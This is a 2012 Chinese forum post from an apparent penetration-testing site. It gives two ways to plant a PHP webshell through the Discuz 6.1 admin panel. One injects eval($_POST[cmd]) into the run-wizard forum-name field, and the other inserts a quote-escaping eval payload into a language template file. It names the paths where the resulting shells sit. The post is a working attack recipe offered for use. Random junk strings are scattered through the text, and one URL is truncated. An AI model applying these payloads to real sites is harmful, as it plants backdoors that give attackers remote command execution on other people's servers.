中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell- _' R4 i3 m0 G2 u( d
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
& S% r7 i! f. Z1:. A1 K5 N! d6 V' n
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
; z. C  K5 G6 }" O3 b9 V: wadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
# R/ f6 @+ P2 {! o<?php eval($_POST[cmd]);?>
4 L6 }6 j! v- G后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
! C9 S  P" H7 X& ^7 O- F5 @0 H1 F* I5 S1 z
0 W$ U. X+ }, H1 Q% R
2:后台模板管理--默认模板套系--详情
4 K9 O! Z7 G% ^) D) {$ ^templates/default/actions.lang.php
& ?1 H7 a8 ?) u9 s2 mjhackj\\');eval($_POST[cmd])?>;//+ O" ?; \" z+ [9 E

4 G& o* W% @+ D- [2 T1 v利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2